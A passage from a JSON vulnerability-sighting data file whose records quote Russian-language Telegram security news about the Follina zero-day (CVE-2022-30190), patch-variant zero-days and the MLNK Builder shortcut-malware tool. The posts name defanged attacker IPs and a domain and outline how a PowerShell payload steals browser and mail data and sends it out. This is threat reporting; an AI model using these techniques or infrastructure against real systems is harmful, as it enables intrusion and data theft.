\u043f\u0440\u043e\u0431\u043b\u0435\u043c \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Windows, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u043f\u043e \u0441\u0443\u0442\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f MSHTML, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043a\u0430\u043a CVE-2021-40444.\n\nCVE-2022-21882 \u2014 \u044d\u0442\u043e \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-1732 .\n\n\u041e\u0448\u0438\u0431\u043a\u0430 iOS IOMobileFrameBuffer (CVE-2022-22587) \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043f\u0443\u0442\u0430\u043d\u0438\u0446\u0435\u0439 \u0442\u0438\u043f\u043e\u0432 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 Chrome V8 (CVE-2022-1096) \u2014 \u044d\u0442\u043e \u0434\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 \u2014 CVE-2021-30983 \u0438 CVE-2021-30551 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u0414\u0440\u0443\u0433\u0438\u043c\u0438 0-day 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0444\u0435\u043a\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f CVE-2022-1364 (Chrome), CVE-2022-22620 (WebKit), CVE-2021-39793 (Google Pixel), CVE-2022-26134 (Atlassian Confluence) \u0438 CVE-2022-26925 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a PetitPotam).\n\n\u0412 \u043e\u0431\u0449\u0435\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0442\u0430\u043a, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u043b\u0438\u0431\u043e \u0441\u043d\u043e\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0435 \u0436\u0435 \u043e\u0448\u0438\u0431\u043a\u0438.\n\n\u042d\u0442\u043e \u0432\u0441\u0435\u0433\u0434\u0430 \u0433\u0440\u043e\u043c\u043a\u043e \u0438 \u0431\u043e\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0442\u0447\u0430\u0441\u0442\u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u043a\u043e\u0433\u0434\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b 0-day \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u044d\u0442\u043e \u043d\u0435\u0443\u0434\u0430\u0447\u0430 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0434\u043b\u044f \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430 \u044d\u0442\u043e \u043f\u043e\u0434\u0430\u0440\u043e\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b, \u0447\u0442\u043e\u0431\u044b \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u043d\u0435\u043b\u044c\u0437\u044f \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.\n\n\u0427\u0442\u043e\u0431\u044b \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0432\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0430\u043d\u0430\u043b\u0438\u0437 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u0447\u0438\u043d \u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043e\u043a, \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f.", "creation_timestamp": "2022-07-04T20:00:05.000000Z"}, {"uuid": "28307472-e814-44cf-98db-8616d356d46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3032", "content": "\u034fFollinaGate \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0431\u043e\u0440\u043e\u0442\u044b. \u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u0448\u0438\u0431\u043a\u043e\u0439 Microsoft \u0443\u0436\u0435 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422 \u0434\u043b\u044f \u043d\u0430\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0421\u0428\u0410.\n\n\u041a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e 0-day Follina, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 ms-msdt \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441 \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0437\u0430\u043c\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441\u0430 Microsoft \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u0441\u0443\u0435\u0442\u0438\u0442\u044c\u0441\u044f, \u043f\u0440\u0430\u0432\u0434\u0430 \u043f\u043e\u043a\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0431\u0443\u043c\u0430\u0433\u0435, \u043a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f. \n\n\u042d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0447\u0430\u0441\u0442\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c: 0patch \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430\u00a0\u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u00a0\u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0431\u0430\u0433\u0438 Microsoft Windows Support Diagnostic Tool (MSDT).\n\n\u041e \u043d\u043e\u0432\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE CVE-2022-30190\u00a0(c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u043f\u043e CVSS: 7,8) \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Proofpoint, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0445\u043e\u0434\u0435 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0441 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u043b\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441 45.76.53[.]253.\n\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0444\u043e\u0440\u043c\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Base64 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u043a\u0430 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 seller-notification[.]live.\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043c\u0430\u0448\u0438\u043d\u044b, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u043b\u044f \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0430, Proofpoint \u043f\u0440\u0438\u0448\u043b\u0438 \u043a \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u043e \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u043a \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0410\u0420\u0422.\n\n\u041d\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044f \u0438\u043c\u0435\u043d, \u043d\u043e \u0436\u0438\u0440\u043d\u043e \u043d\u0430\u043c\u0435\u043a\u0430\u044f \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u0435\u0439, \u0441\u0442\u0430\u0442\u044c\u0438 \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0447\u0430\u0442\u0430\u044e\u0442 \u0437\u0430\u043f\u0430\u0434\u043d\u044b\u0435 \u0438\u0437\u0434\u0430\u043d\u0438\u044f. \u0425\u043e\u0442\u044f \u043d\u0430\u043c \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043f\u0440\u0438 \u0442\u0430\u043a\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438.", "creation_timestamp": "2022-06-06T20:57:39.000000Z"}, {"uuid": "43f097e5-0b75-4ec7-b3a5-2c009ed6c2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3195", "content": "\u034f\u041e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0443\u0441\u043b\u0443\u0433\u0438 \u0418\u0411 \u0434\u043b\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 Fortune 500, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Resecurity Inc.\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 MLNK Builder - \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (LNK) \u0441 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u043d\u044b\u043c Powershell \u0438 VBS Obfuscator.\n\nMLNK Builder \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432\u00a0Dark Web\u00a0\u0432 \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 4.2 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c \u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u0435 \u043e\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0438 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044f\u0440\u043b\u044b\u043a\u043e\u0432 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f ransomware \u0438\u043b\u0438 \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0438\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0412\u0441\u043f\u043b\u0435\u0441\u043a \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c LNK, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u044b\u0445 \u043a\u0430\u043a APT \u0438 \u0441\u043a\u0438\u043b\u043b\u043e\u0432\u0430\u043d\u043d\u044b\u043c\u0438 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0430\u043c\u0438, \u0431\u044b\u043b \u0437\u0430\u043c\u0435\u0447\u0435\u043d \u0432 \u043f\u0435\u0440\u0438\u043e\u0434 \u0441 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e \u043c\u0430\u0439 \u044d\u0442\u043e\u0433\u043e \u0433\u043e\u0434\u0430 - \u043a\u0430\u043a \u0432 \u0441\u043b\u0443\u0447\u0430\u0435 \u0441 Bumblebee\u00a0Loader \u0438\u00a0UAC-0010 (Armageddon).\n\n\u0420\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 Bumblebee \u0447\u0435\u0440\u0435\u0437 \u043a\u043e\u043d\u0442\u0430\u043a\u0442\u043d\u044b\u0435 \u0444\u043e\u0440\u043c\u044b \u043d\u0430 \u0432\u0435\u0431-\u0441\u0430\u0439\u0442\u0435 \u0446\u0435\u043b\u0438.\u00a0\u0412 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f\u0445 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u043b\u043e\u0441\u044c, \u0447\u0442\u043e \u0432\u0435\u0431-\u0441\u0430\u0439\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0438 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b \u0441\u0441\u044b\u043b\u043a\u0443, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432 \u043a\u043e\u043d\u0435\u0447\u043d\u043e\u043c \u0438\u0442\u043e\u0433\u0435 \u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u043b\u0430 \u0444\u0430\u0439\u043b ISO, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e.\n\nResecurity \u043f\u0440\u0438\u043f\u0438\u0441\u0430\u043b\u0430 \u044d\u0442\u0443 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e \u043a TA578, \u043d\u0430\u0447\u0438\u043d\u0430\u044f \u0441 \u043c\u0430\u044f 2020 \u0433\u043e\u0434\u0430. \u0410\u043a\u0442\u043e\u0440 \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u0435 \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 Ursnif, IcedID, KPOT Stealer, Buer Loader \u0438 BazaLoader, \u0430 \u0442\u0430\u043a\u0436\u0435 Cobalt Strike.\n\n\u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u043e\u0432 Resecurity, \u0442\u0435\u043a\u0443\u0449\u0438\u0435 